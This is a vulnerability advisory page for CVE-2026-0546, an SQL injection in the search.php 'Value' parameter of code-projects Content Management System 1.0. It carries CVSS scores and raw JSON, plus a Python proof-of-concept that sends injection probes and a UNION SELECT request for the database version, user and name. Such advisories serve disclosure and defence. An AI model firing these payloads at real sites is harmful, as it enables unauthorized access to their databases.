Security Vulnerability Report
CVE-2026-0546 CVSS 7.3 HIGH

CVE-2026-0546

Published: 2026-01-02 09:15:43
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was identified in code-projects Content Management System 1.0. It affects an unknown function of the file search.php. Manipulating the argument Value leads to SQL injection. The attack can be carried out remotely. The exploit has been publicly disclosed and may be used.

CVSS Details

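CVSS Score (v3.1, Secondary source)
7.3 (the raw JSON record on this page also carries a Primary v3.1 assessment of 9.8 CRITICAL, vector C:H/I:H/A:H, and a v4.0 score of 5.5 MEDIUM)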
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:code-projects:content_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
code-projects Content Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-0546: error-based SQL injection check.

Product:   code-projects Content Management System 1.0
File:      search.php
Parameter: Value (the search term), sent as a GET query parameter

What the script does
  * test_sql_injection() sends five fixed probe strings and reports a
    finding only when the response body contains one of a short list of
    MySQL/PHP error strings.
  * extract_database_info() sends a single UNION SELECT request and
    prints the response length; it does not parse the response.

Reading the output
  "No obvious SQL injection detected" means only that no error text was
  echoed back.  An installation that hides database errors produces the
  same line, so a negative result is not evidence of a fixed system.

What this traffic looks like in web logs
  GET requests to search.php whose Value parameter contains a single
  quote together with OR, UNION SELECT or SLEEP(.  No headers are set,
  so the requests library's default User-Agent is sent.

The weakness class is CWE-89; the usual application-side fix is to bind
the search term as a query parameter instead of concatenating it into
the SQL statement.
"""
import sys

import requests


def test_sql_injection(url):
    """
    Probe search.php and report whether a database error is echoed back.

    Sends each probe string as the ``Value`` query parameter and scans
    the response body, case-insensitively, for known error strings.

    Returns True on the first match, False when no probe produced one.
    Request failures are printed and the next probe is tried.
    """
    endpoint = f"{url}/search.php"

    # Fixed probe strings, sent in this order.  Only an echoed error
    # message counts as a finding: the response time is never measured,
    # so the SLEEP probe is evaluated like the others.
    probes = (
        "' OR '1'='1",
        "' OR 1=1--",
        "admin'--",
        "' UNION SELECT NULL--",
        "' AND SLEEP(5)--",
    )

    # Error strings whose presence in the body is treated as a finding.
    error_markers = (
        'mysql_fetch',
        'mysqli_fetch',
        'SQL syntax',
        'MySQL server version',
        'Warning: mysql',
        'mysqli_error',
        'unterminated string',
    )

    print(f"[*] Testing target: {endpoint}")
    print(f"[*] CVE-2026-0546 SQL Injection Test\n")

    for probe in probes:
        try:
            reply = requests.get(endpoint, params={'Value': probe}, timeout=10)
            body = reply.text.lower()
            # First marker (in list order) found in the lower-cased body.
            hit = next(
                (marker for marker in error_markers if marker.lower() in body),
                None,
            )
            if hit is not None:
                print(f"[!] Potential SQL Injection found with payload: {probe}")
                print(f"[!] Error detected: {hit}")
                return True
        except requests.exceptions.RequestException as exc:
            print(f"[!] Request failed: {exc}")

    print("[*] No obvious SQL injection detected with basic payloads")
    return False


def extract_database_info(url):
    """
    Send one UNION SELECT request to search.php and report the reply size.

    Nothing is extracted or parsed here: on HTTP 200 the function prints
    the response length and a reminder that the body has to be reviewed
    by hand.  Other status codes produce no output.  Returns None.
    """
    endpoint = f"{url}/search.php"

    # Single fixed request; the five-column shape is hard-coded.
    union_probe = "' UNION SELECT NULL,NULL,version(),user(),database()--"

    print(f"\n[*] Attempting to extract database information...")
    print(f"[*] Payload: {union_probe}")

    try:
        reply = requests.get(endpoint, params={'Value': union_probe}, timeout=10)
        if reply.status_code != 200:
            return
        print(f"[+] Response received (length: {len(reply.text)})")
        # The response content is not inspected by this script.
        print("[*] Manual analysis of response required")
    except requests.exceptions.RequestException as exc:
        print(f"[!] Request failed: {exc}")


if __name__ == "__main__":
    cli_args = sys.argv[1:]
    if not cli_args:
        print("Usage: python cve-2026-0546.py <target_url>")
        print("Example: python cve-2026-0546.py http://target.com/cms")
        sys.exit(1)

    # Trailing slashes are dropped so "/search.php" joins cleanly.
    target = cli_args[0].rstrip('/')
    test_sql_injection(target)
    extract_database_info(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0546", "sourceIdentifier": "[email protected]", "published": "2026-01-02T09:15:42.917", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in code-projects Content Management System 1.0. This impacts an unknown function of the file search.php. This manipulation of the argument Value causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:code-projects:content_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "02CCDB18-7E64-4F10-9D59-7781D4806075"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/gtxy114514/CVE/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.339338", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.339338", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.728924", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}